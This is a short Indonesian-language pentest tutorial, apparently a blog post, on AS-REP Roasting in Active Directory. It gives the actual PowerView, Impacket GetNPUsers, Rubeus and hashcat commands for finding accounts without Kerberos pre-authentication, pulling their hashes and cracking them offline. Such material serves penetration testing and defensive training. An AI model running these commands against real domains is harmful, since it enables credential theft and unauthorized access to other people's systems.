[Kerberos] AS-REP Roasting
ASREP Roasting adalah teknik lain yang bisa digunakan untuk mengeksploitasi cara Kerberos bekerja. Teknik ini bisa digunakan kepada pengguna yang tidak mengaktifkan Kerberos pre-authentication.
Pre-authentication adalah metode yang digunakan oleh Kerberos untuk mengonfirmasi identitas pengguna sebelum mengeluarkan Ticket Granting Ticket (TGT).
Jika pre-authentication dinonaktifkan, ini berarti bahwa siapa pun dapat meminta Authentication Service Response (AS-REP) untuk pengguna tersebut, dan tiket tersebut di-crack secara offline untuk mendapatkan password plaintext-nya.
0x1 - Exploitation Stages
Step 1: ASREPRoastable Enumeration
Seperti halnya kerberoasting, kita tidak ingin melakukan asreproast pada setiap akun di domain.
1
2
3
# Enumerasi ASREPRoastable menggunakan PowerView
PS > . .\PowerView.ps1
PS > Get-NetUser -PreauthNotRequired
Step 2: ASREP Roasting
A. Impacket
1
2
# Remote, hanya membutuhkan username (tanpa password)
➜ GetNPUsers.py <domain>/ -usersfile <users.txt> -format <hashcat|john> -outputfile <output.txt> -no-pass -dc-ip
B. Rubeus
1
PS > Rubeus.exe asreproast /user:squid_svc /nowrap
0x2 - Crack the Ticket
1
➜ hashcat -m 18200 pass.hash /usr/share/wordlists/rockyou.txt
0x3 - References
- https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/
- https://akimbocore.com/article/asrep-roasting/
This post is licensed under CC BY 4.0 by the author.